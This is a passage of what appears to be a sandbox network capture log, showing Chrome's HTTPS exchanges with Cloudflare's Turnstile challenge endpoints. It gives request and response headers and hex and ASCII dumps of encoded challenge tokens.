                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC15100OUTData Raw: 64 6e 50 52 72 30 50 41 44 6a 4d 58 36 53 6d 52 55 46 6a 24 34 55 37 7a 59 6b 76 64 46 36 68 37 5a 66 78 69 36 71 66 66 66 74 67 4a 66 4b 4e 2d 69 64 59 66 51 4e 70 47 6a 34 58 69 66 41 4e 64 6b 66 61 66 33 4e 78 36 37 53 56 6a 39 30 45 71 6e 66 46 66 56 4e 6a 2d 69 32 65 78 66 41 36 66 6b 66 66 46 37 61 66 75 4e 36 51 6e 6c 66 41 45 57 4f 4e 6a 4e 56 79 36 51 65 33 66 32 4e 78 38 66 37 66 68 69 6a 36 66 79 24 4b 69 36 45 66 2d 66 36 66 6a 45 66 77 66 43 69 66 46 66 34 66 45 65 36 61 37 44 66 53 66 6a 61 37 61 66 74 68 37 4e 66 51 66 69 50 36 55 66 4b 47 53 4b 36 4a 66 6e 66 34 69 66 47 30 4f 68 53 69 46 47 6a 4f 66 34 69 51 47 6a 78 66 35 69 43 47 6a 41 66 39 69 53 45 30 78 66 77 69 46 4c 30 49 66 54 69 49 45 30 32 66 42 69 43 4c 6a 48 66 72 69 53 46 30
                                                                                                                                                                                                                                                                                      Data Ascii: dnPRr0PADjMX6SmRUFj$4U7zYkvdF6h7Zfxi6qffftgJfKN-idYfQNpGj4XifANdkfaf3Nx67SVj90EqnfFfVNj-i2exfA6fkffF7afuN6QnlfAEWONjNVy6Qe3f2Nx8f7fhij6fy$Ki6Ef-f6fjEfwfCifFf4fEe6a7DfSfja7afth7NfQfiP6UfKGSK6Jfnf4ifG0OhSiFGjOf4iQGjxf5iCGjAf9iSE0xfwiFL0IfTiIE02fBiCLjHfriSF0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:54 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 26272
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-gen: SWVVimRSveGklCpOZ74nhn3ysTLlxZ1ccPeqafbfAFfFmNGRiJSRnp1l6JKewEzHsj3D1PFa290Z3WNv$HR51S7AN8kglYMC9
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d455fef942c98-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1039INData Raw: 69 59 64 4c 59 57 47 44 5a 59 68 36 69 47 32 4f 64 6c 65 46 62 70 4e 58 5a 49 74 35 61 35 4b 50 66 58 42 35 66 48 5a 30 63 47 64 2f 61 6f 56 34 65 35 32 4b 61 62 4f 75 6a 6e 4f 79 69 34 57 4f 69 5a 65 4c 72 4c 4b 67 66 61 6d 36 6c 59 36 6c 75 34 53 36 79 59 4c 4a 6c 4c 69 75 69 59 69 44 77 36 33 52 31 74 4b 55 72 5a 4f 77 74 37 53 62 75 64 71 71 6e 64 62 59 6f 39 75 35 36 4e 71 6f 32 65 58 67 36 71 62 4e 33 38 37 43 7a 4e 58 52 31 4c 4f 7a 77 72 62 48 7a 73 7a 72 33 77 44 37 38 4f 50 68 78 66 54 43 77 64 33 56 78 50 7a 63 43 76 73 4f 30 63 54 4a 79 67 51 4e 36 42 66 58 43 74 59 47 46 42 30 4f 39 69 49 51 38 66 59 58 48 52 73 4b 2b 75 4c 35 43 2f 73 6e 42 77 41 6d 37 79 45 51 4e 2f 49 31 39 6a 4c 33 37 52 6f 70 43 77 6b 69 43 77 73 64 44 68 6f 76 41 67 59
                                                                                                                                                                                                                                                                                      Data Ascii: iYdLYWGDZYh6iG2OdleFbpNXZIt5a5KPfXB5fHZ0cGd/aoV4e52KabOujnOyi4WOiZeLrLKgfam6lY6lu4S6yYLJlLiuiYiDw63R1tKUrZOwt7SbudqqndbYo9u56Nqo2eXg6qbN387CzNXR1LOzwrbHzszr3wD78OPhxfTCwd3VxPzcCvsO0cTJygQN6BfXCtYGFB0O9iIQ8fYXHRsK+uL5C/snBwAm7yEQN/I19jL37RopCwkiCwsdDhovAgY
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 75 63 48 6d 4c 5a 59 6d 55 65 46 2b 51 67 6d 42 34 6a 56 39 76 61 4b 4b 65 6c 71 43 4f 6a 57 46 70 62 49 57 49 70 6e 53 66 74 4b 4b 68 68 70 46 7a 6a 48 6d 38 75 70 36 31 6d 4a 44 43 70 4a 2b 6e 67 4c 32 63 79 34 71 70 67 63 66 45 30 73 4b 6d 72 71 50 55 73 36 37 59 6c 72 76 58 32 39 48 4a 73 62 53 61 77 4d 36 64 76 75 6d 31 36 74 37 4c 79 75 50 61 37 39 2f 4c 36 75 58 53 72 75 62 44 37 2f 48 54 38 65 2f 61 30 65 2f 56 76 4f 75 38 32 4d 2f 6a 2f 67 6e 6d 35 39 34 41 42 68 44 6b 2f 51 30 49 44 74 50 69 37 68 4c 34 48 41 55 61 2b 78 66 74 36 2b 72 37 4a 64 37 76 46 76 41 55 49 69 76 6e 48 51 37 38 48 68 45 79 44 67 2f 39 4e 41 41 51 44 76 6b 7a 2b 77 6f 79 4d 77 73 75 4b 6b 4d 74 50 2f 63 57 4d 79 52 44 53 79 73 63 49 43 59 6d 47 53 59 54 48 45 59 56 4a 6b
                                                                                                                                                                                                                                                                                      Data Ascii: ucHmLZYmUeF+QgmB4jV9vaKKelqCOjWFpbIWIpnSftKKhhpFzjHm8up61mJDCpJ+ngL2cy4qpgcfE0sKmrqPUs67YlrvX29HJsbSawM6dvum16t7LyuPa79/L6uXSrubD7/HT8e/a0e/VvOu82M/j/gnm594ABhDk/Q0IDtPi7hL4HAUa+xft6+r7Jd7vFvAUIivnHQ78HhEyDg/9NAAQDvkz+woyMwsuKkMtP/cWMyRDSyscICYmGSYTHEYVJk
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 6a 56 5a 36 6c 4a 70 64 65 31 32 57 65 49 4b 47 6d 34 56 72 70 49 71 5a 67 5a 71 48 73 4a 39 30 68 6f 47 51 73 5a 4b 77 73 72 43 6e 75 59 46 30 66 70 75 59 6c 5a 6a 48 71 6f 4f 73 76 62 2b 63 77 72 32 62 6d 70 43 79 71 74 54 4d 7a 71 58 5a 6b 36 61 62 32 4b 71 5a 33 4c 50 57 6d 74 33 6a 78 71 66 62 79 37 2f 64 75 63 6a 68 7a 75 6a 73 72 4f 37 6e 72 61 36 75 31 62 6a 36 78 62 50 66 39 66 33 77 39 76 44 63 75 2f 54 6a 31 2f 54 42 78 74 34 47 32 4e 67 4b 41 67 7a 65 44 64 48 49 47 52 72 6b 38 4e 4d 46 48 64 72 7a 49 68 59 50 2b 2f 48 32 42 41 6b 5a 43 77 6b 72 48 77 37 70 42 53 48 78 48 7a 49 7a 4b 43 51 75 4d 42 51 53 47 6a 77 30 4e 78 49 32 4f 44 49 31 49 6a 59 68 4d 78 51 32 42 53 77 37 54 42 6c 46 4a 55 4e 4d 52 55 31 47 51 6b 38 5a 47 56 67 35 54 55 77
                                                                                                                                                                                                                                                                                      Data Ascii: jVZ6lJpde12WeIKGm4VrpIqZgZqHsJ90hoGQsZKwsrCnuYF0fpuYlZjHqoOsvb+cwr2bmpCyqtTMzqXZk6ab2KqZ3LPWmt3jxqfby7/ducjhzujsrO7nra6u1bj6xbPf9f3w9vDcu/Tj1/TBxt4G2NgKAgzeDdHIGRrk8NMFHdrzIhYP+/H2BAkZCwkrHw7pBSHxHzIzKCQuMBQSGjw0NxI2ODI1IjYhMxQ2BSw7TBlFJUNMRU1GQk8ZGVg5TUw
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 59 4f 43 68 47 56 6a 58 57 68 74 72 4b 53 73 66 6e 71 4e 6e 61 64 73 6f 6f 35 78 64 49 74 34 64 6e 5a 33 64 38 4a 36 6a 72 47 64 68 5a 75 53 6d 49 61 48 74 38 6e 49 79 62 44 4d 7a 4d 53 7a 72 4c 43 75 78 37 6d 5a 72 63 65 36 32 36 71 66 73 4e 58 69 31 38 50 61 76 4a 2f 48 77 4e 69 69 70 2b 2b 73 76 39 7a 6f 71 36 62 6a 37 4d 53 31 36 4c 54 63 7a 2f 4b 36 36 66 54 2b 79 67 54 53 38 67 54 77 34 39 72 6b 78 51 33 71 78 4f 45 52 42 77 34 43 30 4e 30 53 36 41 6e 79 47 2f 77 48 38 39 67 4b 48 52 62 66 2b 41 48 69 46 42 58 61 47 75 45 6c 4a 67 45 77 2b 51 54 75 49 51 73 55 37 2b 38 74 38 41 38 50 4b 54 77 30 4f 51 30 58 48 7a 59 6a 44 51 4d 38 4f 68 34 2f 51 77 4d 72 51 45 41 65 51 68 74 4e 4d 42 51 53 4d 45 6b 32 4e 7a 78 53 54 53 6b 32 58 6a 4d 62 55 46 34 37
                                                                                                                                                                                                                                                                                      Data Ascii: YOChGVjXWhtrKSsfnqNnadsoo5xdIt4dnZ3d8J6jrGdhZuSmIaHt8nIybDMzMSzrLCux7mZrce626qfsNXi18PavJ/HwNiip++sv9zoq6bj7MS16LTcz/K66fT+ygTS8gTw49rkxQ3qxOERBw4C0N0S6AnyG/wH89gKHRbf+AHiFBXaGuElJgEw+QTuIQsU7+8t8A8PKTw0OQ0XHzYjDQM8Oh4/QwMrQEAeQhtNMBQSMEk2NzxSTSk2XjMbUF47
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 74 36 67 32 64 76 66 70 79 67 74 4b 2b 77 67 4a 6d 4e 6a 61 75 61 6c 4c 2b 71 77 5a 32 63 6c 35 44 45 68 4d 43 5a 78 72 53 6d 6e 63 76 48 75 4a 33 4e 70 63 75 7a 70 4d 76 45 6b 4e 6d 76 6d 72 61 77 76 62 69 59 77 4d 43 30 35 63 37 43 76 65 58 52 35 2b 62 63 32 4d 6e 68 78 36 33 4e 38 39 47 76 7a 2b 4f 71 39 50 66 75 39 73 72 72 41 50 51 41 2b 67 54 68 33 4e 6e 68 30 63 4c 4b 2b 4e 76 4c 2b 38 48 76 33 67 66 30 2f 76 37 6b 46 4f 6f 48 36 42 73 46 43 64 63 51 37 77 6f 5a 33 50 67 47 34 66 6e 33 48 4f 49 55 43 41 77 4e 36 50 6f 67 41 67 59 48 48 67 54 76 4c 79 49 61 38 7a 67 77 4e 53 38 69 4c 2f 77 56 49 79 51 36 4f 42 30 32 4b 41 67 34 50 78 30 75 48 7a 31 48 44 52 31 45 4a 30 64 44 52 7a 74 62 52 55 78 54 57 79 46 4e 48 7a 55 6c 55 30 67 39 53 56 67 6d 59
                                                                                                                                                                                                                                                                                      Data Ascii: t6g2dvfpygtK+wgJmNjaualL+qwZ2cl5DEhMCZxrSmncvHuJ3NpcuzpMvEkNmvmrawvbiYwMC05c7CveXR5+bc2Mnhx63N89Gvz+Oq9Pfu9srrAPQA+gTh3Nnh0cLK+NvL+8Hv3gf0/v7kFOoH6BsFCdcQ7woZ3PgG4fn3HOIUCAwN6PogAgYHHgTvLyIa8zgwNS8iL/wVIyQ6OB02KAg4Px0uHz1HDR1EJ0dDRztbRUxTWyFNHzUlU0g9SVgmY
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 78 62 72 4b 7a 6c 34 70 76 75 49 71 6c 68 70 56 32 6b 6e 70 34 65 58 39 33 73 4a 2b 6b 79 4c 57 65 6d 4d 36 34 79 4a 2b 49 6d 36 32 4e 30 4e 44 51 72 4e 6d 76 74 72 4b 71 73 70 36 75 33 36 4b 79 33 61 2b 75 33 62 57 66 35 39 65 65 72 64 7a 6f 70 72 6e 64 37 63 43 72 7a 76 44 68 72 37 44 73 75 50 7a 53 75 64 30 43 38 63 76 67 42 77 48 46 31 67 63 46 39 4e 73 4e 2b 65 4c 63 32 67 33 71 37 64 49 56 42 75 72 69 43 4e 6e 57 47 78 77 41 38 74 63 68 38 67 37 75 2f 64 37 36 34 75 44 68 35 39 38 5a 43 41 30 7a 4c 66 45 4b 4e 69 59 44 43 7a 6f 31 4c 4f 37 31 4b 54 45 4f 51 41 73 74 45 50 77 7a 51 68 6b 55 4f 53 76 2b 44 67 30 4f 43 68 78 51 45 78 34 50 56 54 4d 5a 4a 46 5a 5a 45 78 41 32 56 53 31 68 58 57 41 65 4d 7a 73 6d 50 32 6c 61 4e 30 4a 75 61 6b 73 2b 63 56
                                                                                                                                                                                                                                                                                      Data Ascii: xbrKzl4pvuIqlhpV2knp4eX93sJ+kyLWemM64yJ+Im62N0NDQrNmvtrKqsp6u36Ky3a+u3bWf59eerdzoprnd7cCrzvDhr7DsuPzSud0C8cvgBwHF1gcF9NsN+eLc2g3q7dIVBuriCNnWGxwA8tch8g7u/d764uDh598ZCA0zLfEKNiYDCzo1LO71KTEOQAstEPwzQhkUOSv+Dg0OChxQEx4PVTMZJFZZExA2VS1hXWAeMzsmP2laN0Juaks+cV
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 70 4b 53 5a 76 61 68 35 6e 4d 47 42 73 4a 6a 47 6d 70 4b 64 67 62 57 6d 6d 73 7a 49 75 4b 58 53 70 73 69 70 30 36 72 51 72 64 69 5a 79 4c 44 64 32 4d 69 7a 34 63 7a 6b 72 4f 58 67 32 4c 6e 6f 35 63 71 39 37 4f 6a 77 77 2f 43 78 76 73 62 30 74 66 54 4d 2b 63 2f 57 7a 62 58 6f 2b 4e 55 41 31 76 7a 67 42 67 45 4a 32 77 76 65 42 64 77 50 2b 4d 6e 59 45 74 45 4e 35 63 30 42 42 65 73 62 37 2f 62 77 48 2f 4c 71 38 79 4c 68 46 66 55 6c 35 52 48 34 4b 65 6b 5a 41 69 77 44 4c 51 49 7a 48 52 30 4a 4e 54 45 74 46 54 73 6c 4b 51 55 2b 2f 53 6b 56 51 78 64 42 46 6b 5a 43 49 78 31 4b 48 78 63 64 54 79 51 76 49 56 49 39 51 53 6f 4f 51 56 6b 32 57 43 39 56 4c 46 35 4a 55 54 4e 69 49 6d 45 31 5a 6a 73 7a 4f 57 6f 71 62 54 39 75 61 56 31 41 63 6a 4a 6c 50 58 5a 68 65 55 63
                                                                                                                                                                                                                                                                                      Data Ascii: pKSZvah5nMGBsJjGmpKdgbWmmszIuKXSpsip06rQrdiZyLDd2Miz4czkrOXg2Lno5cq97Ojww/Cxvsb0tfTM+c/WzbXo+NUA1vzgBgEJ2wveBdwP+MnYEtEN5c0BBesb7/bwH/Lq8yLhFfUl5RH4KekZAiwDLQIzHR0JNTEtFTslKQU+/SkVQxdBFkZCIx1KHxcdTyQvIVI9QSoOQVk2WC9VLF5JUTNiImE1ZjszOWoqbT9uaV1AcjJlPXZheUc
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:54 UTC1369INData Raw: 58 6d 2f 6b 70 48 44 6d 37 6a 4a 67 63 65 61 6d 63 75 6a 6a 61 6d 4a 6b 5a 37 41 6a 4b 37 55 70 4a 50 55 70 71 37 63 79 70 71 7a 34 4c 65 68 72 4f 62 51 35 4c 57 6e 32 4f 69 34 70 2b 69 36 77 76 48 73 30 72 79 7a 79 38 50 4b 2b 4d 2b 35 78 4c 6e 6e 36 4e 2b 2f 2f 65 2b 39 77 64 7a 46 2b 77 55 48 35 74 6b 4d 34 38 33 70 7a 50 7a 65 42 4d 77 44 34 75 44 55 37 2b 6f 4f 48 50 54 32 2b 65 73 64 2f 68 55 6b 2b 39 33 31 4b 41 48 2b 42 75 6b 5a 2b 69 54 6f 48 77 2f 38 38 51 77 48 47 44 67 51 4b 52 59 49 4f 52 73 75 51 42 6c 46 45 68 49 79 52 55 70 4c 49 68 73 6d 47 45 6b 72 4d 46 41 6f 55 56 5a 58 4c 69 63 6d 57 44 42 5a 58 6c 39 4d 4c 7a 6f 73 58 54 39 58 5a 44 78 6c 61 6d 74 59 4f 7a 70 73 52 47 31 79 63 6e 42 44 54 6b 42 78 55 32 78 34 55 48 6c 2b 66 6e 78 50
                                                                                                                                                                                                                                                                                      Data Ascii: Xm/kpHDm7jJgceamcujjamJkZ7AjK7UpJPUpq7cypqz4LehrObQ5LWn2Oi4p+i6wvHs0ryzy8PK+M+5xLnn6N+//e+9wdzF+wUH5tkM483pzPzeBMwD4uDU7+oOHPT2+esd/hUk+931KAH+BukZ+iToHw/88QwHGDgQKRYIORsuQBlFEhIyRUpLIhsmGEkrMFAoUVZXLicmWDBZXl9MLzosXT9XZDxlamtYOzpsRG1ycnBDTkBxU2x4UHl+fnxP


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      27192.168.2.1649738104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:55 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:55 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      cf-chl-out: nDchZ52eeyFS0JJG/gaxwj72b04KbVGDA3I=$KxLznNBMoMXCWl1a
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45669e0b486b-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      28192.168.2.1649739104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:58 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 33912
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:58 UTC16384OUTData Raw: 76 5f 38 64 37 64 34 35 33 36 31 61 64 39 36 63 35 38 3d 49 4a 56 4e 6d 30 37 79 59 36 56 37 4a 64 45 6a 73 37 6d 66 51 78 36 37 72 66 2d 66 32 4e 64 36 37 51 66 70 65 30 4c 6c 37 39 66 30 65 30 45 66 4d 66 53 69 36 45 37 75 6b 47 66 64 58 66 64 79 66 41 56 4e 69 66 79 35 66 63 4a 37 55 57 42 6e 6a 45 66 71 4e 78 47 4a 66 41 47 31 73 36 66 79 65 37 35 66 6b 65 30 6c 64 73 64 6a 71 6a 6f 63 66 56 56 66 39 41 6c 61 58 51 6f 41 66 6a 70 38 75 42 43 78 78 66 66 64 53 66 64 4c 69 6a 34 69 37 67 7a 4e 66 6f 48 49 63 36 66 69 57 6c 24 66 6a 76 71 66 66 35 59 75 64 71 4c 69 66 73 4a 47 55 76 48 46 57 73 43 30 6d 4c 66 43 68 4b 6a 4e 66 70 4c 4e 66 4b 66 56 2d 76 4a 6c 33 45 35 4f 59 34 4a 6d 4d 79 75 68 74 78 66 63 59 6b 48 75 56 32 24 68 72 49 6f 62 4d 6c 4e 33
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d45361ad96c58=IJVNm07yY6V7JdEjs7mfQx67rf-f2Nd67Qfpe0Ll79f0e0EfMfSi6E7ukGfdXfdyfAVNify5fcJ7UWBnjEfqNxGJfAG1s6fye75fke0ldsdjqjocfVVf9AlaXQoAfjp8uBCxxffdSfdLij4i7gzNfoHIc6fiWl$fjvqff5YudqLifsJGUvHFWsC0mLfChKjNfpLNfKfV-vJl3E5OY4JmMyuhtxfcYkHuV2$hrIobMlN3
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:58 UTC16384OUTData Raw: 64 6e 50 52 72 30 50 41 44 6a 4d 58 36 53 6d 52 55 46 6a 24 34 55 37 7a 59 6b 76 64 46 36 68 37 5a 66 78 69 36 71 66 66 66 74 67 4a 66 4b 4e 2d 69 64 59 66 51 4e 70 47 6a 34 58 69 66 41 4e 64 6b 66 61 66 33 4e 78 36 37 53 56 6a 39 30 45 71 6e 66 46 66 56 4e 6a 2d 69 32 65 78 66 41 36 66 6b 66 66 46 37 61 66 75 4e 36 51 6e 6c 66 41 45 57 4f 4e 6a 4e 56 79 36 51 65 33 66 32 4e 78 38 66 37 66 68 69 6a 36 66 79 24 4b 69 36 45 66 2d 66 36 66 6a 45 66 77 66 43 69 66 46 66 34 66 45 65 36 61 37 44 66 53 66 6a 61 37 61 66 74 68 37 4e 66 51 66 69 50 36 55 66 4b 47 53 4b 36 4a 66 6e 66 34 69 66 47 30 4f 68 53 69 46 47 6a 4f 66 34 69 51 47 6a 78 66 35 69 43 47 6a 41 66 39 69 53 45 30 78 66 77 69 46 4c 30 49 66 54 69 49 45 30 32 66 42 69 43 4c 6a 48 66 72 69 53 46 30
                                                                                                                                                                                                                                                                                      Data Ascii: dnPRr0PADjMX6SmRUFj$4U7zYkvdF6h7Zfxi6qffftgJfKN-idYfQNpGj4XifANdkfaf3Nx67SVj90EqnfFfVNj-i2exfA6fkffF7afuN6QnlfAEWONjNVy6Qe3f2Nx8f7fhij6fy$Ki6Ef-f6fjEfwfCifFf4fEe6a7DfSfja7afth7NfQfiP6UfKGSK6Jfnf4ifG0OhSiFGjOf4iQGjxf5iCGjAf9iSE0xfwiFL0IfTiIE02fBiCLjHfriSF0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:58 UTC1144OUTData Raw: 47 38 4d 76 42 67 66 2d 69 43 4e 64 35 35 74 31 4d 33 76 36 37 6b 53 58 66 57 75 31 6a 70 78 51 38 36 66 44 55 67 46 34 51 55 63 6c 34 51 68 54 41 77 66 70 56 7a 48 6d 6b 53 6d 72 44 33 51 53 66 66 59 37 24 6d 43 4e 54 7a 51 72 7a 2d 69 32 69 30 54 7a 30 55 6d 4d 51 56 37 77 66 33 35 30 45 37 35 66 66 59 7a 4d 44 6b 78 6c 64 76 43 44 30 34 41 48 41 33 4f 6d 68 2d 69 36 77 53 6c 66 57 7a 50 49 37 32 4e 64 2d 57 39 6c 73 4e 64 4a 37 6e 51 6e 6d 58 65 64 48 50 4e 31 31 69 6a 4b 66 70 24 6e 6a 78 58 38 6b 76 68 55 4f 30 43 55 33 4d 30 53 4c 24 41 69 61 4a 6a 65 54 73 6c 34 51 48 6b 59 6a 69 69 6c 57 39 74 73 34 34 45 37 6c 69 4c 38 59 30 77 72 67 43 66 79 45 30 37 6c 73 58 33 42 58 4d 66 72 4c 63 6e 6f 39 58 70 42 72 66 4b 6f 32 62 4e 79 73 64 4f 6a 34 6c 42
                                                                                                                                                                                                                                                                                      Data Ascii: G8MvBgf-iCNd55t1M3v67kSXfWu1jpxQ86fDUgF4QUcl4QhTAwfpVzHmkSmrD3QSffY7$mCNTzQrz-i2i0Tz0UmMQV7wf350E75ffYzMDkxldvCD04AHA3Omh-i6wSlfWzPI72Nd-W9lsNdJ7nQnmXedHPN11ijKfp$njxX8kvhUO0CU3M0SL$AiaJjeTsl4QHkYjiilW9ts44E7liL8Y0wrgCfyE07lsX3BXMfrLcno9XpBrfKo2bNysdOj4lB
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:59 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 4544
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out: lETTow4Q8uPIDF/YdPU+AfAU4tIMQvLvGe8DgAzGXbm32Lh3ttEpQBoWK2d78Hds2Ia2uxOKENUgOX0q37adE8Y/Qm/L5gI4hMBCC2sk9UNC3xlZWtJzpfM=$cf+IsE2aADrEuAM8
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC1247INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 41 44 75 35 73 33 55 65 2b 2f 78 37 76 4b 6f 6e 44 5a 50 53 4a 72 38 58 73 68 64 6d 48 76 41 79 4b 75 2f 74 41 46 64 51 58 57 74 76 6d 4e 35 2b 53 44 37 42 2f 76 34 56 44 76 72 35 56 61 33 2f 39 37 69 2b 36 61 36 31 72 54 58 57 64 4f 6d 6d 73 46 68 7a 33 62 66 46 78 6c 4e 68 66 49 49 76 65 6d 4d 61 67 71 6c 77 48 32 71 46 72 46 6c 66 30 4e 76 33 76 4f 51 57 4d 53 37 71 37 49 6c 6e 37 72 6f 4b 2b 33 55 79 35 45 51 69 64 36 57 67 61 35 49 61 78 4d 48 64 6e 6f 42 7a 70 51 43 66 50 72 39 79 45 7a 64 6b 42 67 73 4b 48 45 43 6d 36 66 6f 49 75 66 45 31 69 47 62 70 6f 2b 4f 6f 39 52 44 52 55 39 72 34 50 4a 70 2b 62 43 65 41 78 72 43 34 74 6f 47 56 69 6f 61 69 38 39 70 4d 33 77 6f 6b 43 7a 57 68 56 4a 42 73 6f 51 2f 71 79
                                                                                                                                                                                                                                                                                      Data Ascii: cf-chl-out-s: ADu5s3Ue+/x7vKonDZPSJr8XshdmHvAyKu/tAFdQXWtvmN5+SD7B/v4VDvr5Va3/97i+6a61rTXWdOmmsFhz3bfFxlNhfIIvemMagqlwH2qFrFlf0Nv3vOQWMS7q7Iln7roK+3Uy5EQid6Wga5IaxMHdnoBzpQCfPr9yEzdkBgsKHECm6foIufE1iGbpo+Oo9RDRU9r4PJp+bCeAxrC4toGVioai89pM3wokCzWhVJBsoQ/qy
